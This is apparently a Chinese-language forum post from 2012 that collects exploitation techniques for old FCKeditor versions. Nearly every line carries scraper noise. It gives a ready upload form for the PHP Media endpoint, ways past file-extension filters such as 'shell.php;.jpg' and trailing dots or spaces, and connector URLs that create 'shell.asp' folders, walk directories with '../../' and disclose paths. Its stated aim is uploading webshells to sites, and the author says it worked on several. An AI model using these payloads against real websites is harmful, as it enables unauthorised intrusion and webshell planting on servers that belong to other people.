Fckeditor漏洞利用总结 " [5 }3 [! c0 c/ V( W) d
查看编辑器版本% L; S! I1 y) ?( N
FCKeditor/_whatsnew.html9 g8 Q8 i, j) Z9 \: k
—————————————————————————————————————————————————————————————
. G% i! E$ @3 ]9 M4 f8 f- F7 i( ]8 }
2. Version 2.2 版本
/ b& p: ]6 b" w# h* M: H' I( _4 d; V& }Apache+linux 环境下在上传文件后面加个.突破!测试通过。7 Z' i4 {: |% H% N" z$ {3 {2 J6 \7 h8 Y
—————————————————————————————————————————————————————————————3 H g+ Y/ ^' H6 t
" N; n0 e5 y9 n7 n% i* L6 P
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
/ m6 J/ Z- N! ^3 _9 g& h5 U<form id="frmUpload" enctype="multipart/form-data"
- v$ ~8 q5 l5 k/ \action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
: G l! N% ^, K+ t, M6 e/ G<input type="file" name="NewFile" size="50"><br> ]% T# B( h5 z
<input id="btnUpload" type="submit" value="Upload">3 A% Y- T. q/ F. |. Q
</form>/ r, r; i! I" m
—————————————————————————————————————————————————————————————
' p( F' ?, j* x, J- w" i
# v# p& n5 q0 i/ B! T9 x: t" {4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
' q0 o1 _8 \9 p3 g 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。4 L- V: H6 }; |9 K) f
4.1:提交shell.php+空格绕过" |4 j$ [5 S4 b& R* S6 w, |7 n3 [! ^
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
* L0 Q) J$ V, m7 F: t5 ?9 @ 4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
& n2 K5 N0 M: e; F7 J—————————————————————————————————————————————————————————————
" _. Y3 R6 V2 ]
7 d0 `/ b0 R& b% {7 H F! d% ?1 y5. 突破建立文件夹
& w3 I) a$ z2 b7 H% G" U( vFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=12447899756843 _+ V7 T4 @/ q. h' H
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
|0 Z) y& ~0 A& v+ b% z) V—————————————————————————————————————————————————————————————6 i" m) I( q6 `& p& R9 O+ u
6 K# M7 C8 M, Q: _. l
6. FCKeditor 中test 文件的上传地址$ g- |5 U9 A) Z# }
FCKeditor/editor/filemanager/browser/default/connectors/test.html' w/ F- N! f$ p) c3 G" A7 w
FCKeditor/editor/filemanager/upload/test.html
8 }7 x* a P" U/ a5 k1 o: \7 jFCKeditor/editor/filemanager/connectors/test.html
& S& N8 y( D" v+ Z: D2 @0 VFCKeditor/editor/filemanager/connectors/uploadtest.html: u8 @3 ]( o3 _
—————————————————————————————————————————————————————————————( @/ E4 k1 y, I/ a+ G
& S, F' a5 u F! P2 ^ S1 H* x
7.常用上传地址5 t* b8 `# R# i# B% i! }$ x
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
X: R! k/ ^/ k& e. I0 TFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp" ?; N% c' F$ P6 Q8 V
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)( B: I- M, D" {$ q
JSP 版:; T8 f9 \+ }1 T- c# `) P6 C n$ R; J; d
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
& z/ [" R4 n4 [ ?) p4 K注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文; c: I( S3 L& [' ^- K/ a7 {' T9 h
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。$ _1 x$ @9 W. w- G# a
—————————————————————————————————————————————————————————————5 [( T3 F% K6 F9 O& z+ i
- I/ u2 ^) x: E- U7 }
8.其他上传地址. x0 z2 d% N) Y% {/ E0 M
FCKeditor/_samples/default.html) c2 r) {- e4 K* H2 R$ G' A1 ?
FCKeditor/_samples/asp/sample01.asp& E' T. D4 @+ w W. H0 p& Z
FCKeditor/_samples/asp/sample02.asp# @5 N: V! B6 o9 @
FCKeditor/_samples/asp/sample03.asp' ~- S! h2 c. P( x% X; {
FCKeditor/_samples/asp/sample04.asp
4 M3 V) F: Y+ {# d# I一般很多站点都已删除_samples 目录,可以试试。5 \2 J3 d, ^ H, i! W4 w( I+ C
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
' U$ ?) Y5 g6 }' V& |—————————————————————————————————————————————————————————————
* }9 U2 E u4 n8 ~, R9 M# v& Z, P4 G3 c
9.列目录漏洞也可助找上传地址" X+ C$ [- R* j* L0 Q! x$ g' x1 r
Version 2.4.1 测试通过
( D7 x. @9 t# S1 ^- n' Q修改CurrentFolder 参数使用 ../../来进入不同的目录; J% ]3 E, e: @/ D* {' F2 ]
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
3 o! O$ g5 o2 s0 q: I8 y根据返回的XML 信息可以查看网站所有的目录。# A& F* m0 Q% u6 E1 w
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F6 i5 v: v* H! f
也可以直接浏览盘符:
) S, M' d9 C9 F0 V |JSP 版本:
( R; w& p- Y# ?7 jFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F. {) Y5 `$ _$ ^* L
—————————————————————————————————————————————————————————————
5 q: E- v, W, n7 w
9 S+ @( }5 Y' n/ j: O: ]4 J10.爆路径漏洞
$ l2 r2 s1 z/ G. U0 h$ g& rFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp: g- _/ K' i/ h: A$ z
—————————————————————————————————————————————————————————————
$ g$ j' G& Q0 Y
% c) c' u K* X/ p! l11. FCKeditor 被动限制策略所导致的过滤不严问题4 r3 G0 l& q& \4 C; M+ ^7 u6 u
影响版本: FCKeditor x.x <= FCKeditor v2.4.3; ^; f1 K9 c- `$ Q/ `! t
脆弱描述:# m2 D$ [7 ^" G {5 c3 G7 Y# N
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
( w. {3 U* [$ u' f2 ^1 h% i" jhtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm& f1 v+ V- v8 w
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
* H0 a4 i4 O- @; n/ v: P& T 而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
% @6 N; _: O, ^. P 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
) g4 |! X8 } L7 Y3 d) a: Q! f( N—————————————————————————————————————————————————————————————. ^' |* n7 M9 @$ ]3 e
* t: y/ N6 L8 G7 I3 s* _
12.最古老的漏洞,Type文件没有限制!
8 J2 z" o$ }. q9 O) y9 K$ g 我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
5 F% s A! F# M7 c$ y—————————————————————————————————————————————————————————————
3 d7 f# G* J5 l7 }- I; u0 B) }6 I
===============================================================================================================================================. a3 Z6 d) p3 m- [
2 E! W& I4 L& ^, o# O
FCK编辑器jsp版本漏洞:$ u7 Z l7 e1 { _% k1 {
1 Q; t( _% I9 S @; M+ D2 k3 F$ Z
$ V$ n' y" M9 F1 a4 w) lhttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
0 I5 ~9 E2 g2 s* B: O
- b+ z8 ]/ ]6 \0 A9 p上传马所在目录# u; {% y- u' D' T0 L+ @ O, G
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/ _4 K' N1 ]! C& K上传shell的地址:2 O: ~$ _9 b6 K" E
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
& W4 J; u1 i6 N- }: p% L跟版本有关系.并不是百分百成功. 测试成功几个站.% u% K& q0 u) X' \9 g! c6 i
不能通杀.很遗憾.
0 d( u" s2 ?4 V3 {8 E! phttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
) y0 F5 ?8 F. b0 Y& `如果以上地址不行可以试试
) T! `- D' D$ `$ SFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
% U) U. ?; p* ?8 K3 Q8 U0 c( xFCKeditor/_samples/2 M% [$ f' K& n5 M; H o
FCKeditor/_samples/default.html* E: Z9 u- k5 `# \" R3 ^
FCKeditor/editor/fckeditor.htm
- A: ^# Y% i6 ?, n* q% uFCKeditor/editor/fckdialog.html
- \* @/ [+ P( X/ j u. h9 m' E
1 ~4 c, u( X9 H7 a$ r; Y( s
4 }3 ]% \: q* m+ w; W0 F3 R/ R
, I8 m7 T1 K* J2 b解析漏洞+未重命名文件时上传漏洞 1.asp;jpg( V' o: P' S: ~7 h$ }/ Z" T
|
发表于 2012-9-13 17:01:39
收藏
支持
反对